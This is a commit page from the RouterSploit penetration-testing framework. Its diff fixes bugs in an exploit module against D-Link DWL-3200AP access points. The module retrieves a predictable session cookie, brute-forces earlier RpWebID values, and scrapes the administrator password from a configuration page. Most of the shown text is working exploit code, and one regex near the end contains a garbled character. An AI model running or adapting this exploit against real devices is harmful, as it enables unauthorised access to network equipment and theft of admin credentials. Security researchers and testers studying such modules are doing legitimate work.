Fixing minor bugs, methods, type conversion

aae60fb8 · lucyoa · 514a62eb · aae60fb8
Commit aae60fb8 authored 8 years ago by lucyoa
Show whitespace changes
Inline Side-by-side

Showing with 13 additions and 9 deletions

dwl_3200ap_password_disclosure.py .../modules/exploits/dlink/dwl_3200ap_password_disclosure.py +13 -9

No files found.
--- a/routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py
+++ b/routersploit/modules/exploits/dlink/dwl_3200ap_password_disclosure.py
@@ -14,11 +14,11 @@ from routersploit import (

 class Exploit(exploits.Exploit):
    """
-    Exploits DLINK DWL3200 access points weak cookie value
+    Exploits D-Link DWL-3200AP access points weak cookie value
    """
    __info__ = {
-        'name': 'D-Link AP 3200 - Password Disclosure',
-        'description': 'Exploits DLINK DWL3200 access points weak cookie value',
+        'name': 'D-Link DWL-3200AP Password Disclosure',
+        'description': 'Exploits D-Link DWL3200 access points weak cookie value',
        'authors': [
            'pws',  # Vulnerability discovery
            'Josh Abraham <sinisterpatrician[at]google.com>',  # routersploit module
@@ -27,21 +27,25 @@ class Exploit(exploits.Exploit):
            'https://www.exploit-db.com/exploits/34206/',
        ],
        'devices': [
-            'DLINK DWL3200',
+            'D-Link DWL-3200AP',
        ],
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
    port = exploits.Option(80, 'Target port')  # default port

+    # 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour
+    seconds = exploits.Option(3600, 'Number of seconds in the past to bruteforce')
+
    def run(self):
        if self.check():
            cookie_value = self.get_cookie()
            print_success("Cookie retrieved: {}".format(cookie_value))

            cookie_int = int(cookie_value, 16)
-            start = cookie_int - 3600
+            start = cookie_int - int(self.seconds)

+            print_status("Starting bruteforcing cookie value...")
            for i in xrange(cookie_int, start, -1):
                self.test_cookie(i)
        else:
@@ -74,14 +78,14 @@ class Exploit(exploits.Exploit):
        except Exception:
            print_error("Unable to connect to target")

-    def test_cookie(cookie_int, self):
+    def test_cookie(self, cookie_int):
        """
-        Method that tests all cookies from past hour to find one that is valid
+        Method that tests all cookies from the past to find one that is valid
        """
        url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port)
-        cookie = dict(RpWebID=cookie_int)
+        cookies = dict(RpWebID=str(cookie_int))
        try:
-            r = http_request(method='GET', url=url, cookie=cookie, timeout=10)
+            r = http_request(method='GET', url=url, cookies=cookies, timeout=10)
            if ('NAME="OldPwd"' in r.text):
                print_success("Cookie {} is valid!".format(cookie_int))
                pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""